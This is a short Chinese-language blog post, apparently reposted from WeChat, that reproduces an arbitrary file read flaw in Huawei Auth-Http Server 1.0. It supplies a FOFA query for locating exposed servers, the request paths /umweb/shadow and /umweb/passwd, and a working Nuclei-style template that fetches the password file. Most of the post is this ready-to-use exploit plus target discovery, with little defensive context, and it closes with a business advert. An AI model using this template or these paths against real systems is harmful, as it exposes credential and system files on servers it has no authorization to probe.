华为Auth-Http Serve任意文件读取漏洞复现
2023-11-24 17:50:19 Author: 网络安全交流圈(查看原文) 阅读量:86 收藏

漏洞描述:

 Huawei Auth-Http任意文件泄露漏洞,攻击者可构造恶意请求获取系统信息等及其它安全风险。

FOFA:

server="Huawei Auth-Http Server 1.0"

POC:来源于互联网

/umweb/shadow

id: huanwei-auth-http-server-fileread
info:name: 华为Auth-Http Server 1.0任意文件读取author:severity: mediumdescription: 华为Auth-Http Server 1.0任意文件读取,攻击者可通过此漏洞获取敏感信息。
reference:- https://metadata:fofa-query: server="Huawei Auth-Http Server 1.0"verified: truemax-request: 1
http:- raw:- |GET /umweb/passwd HTTP/1.1Host: {{Hostname}}

matchers:- type: dsldsl:- 'status_code==200 && contains_all(body,"root")'


欢迎添加微信进行业务咨询:

承接以下业务:


文章来源: http://mp.weixin.qq.com/s?__biz=MzI1MDk3NDc5Mg==&mid=2247485130&idx=1&sn=8d0ec4f00a8f57bce5770816f1b394c3&chksm=e9fb41edde8cc8fb6767b2ca86af573f69bd99c2c7634c3f3b03d573cd2df8c28d0715e8f9d4&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh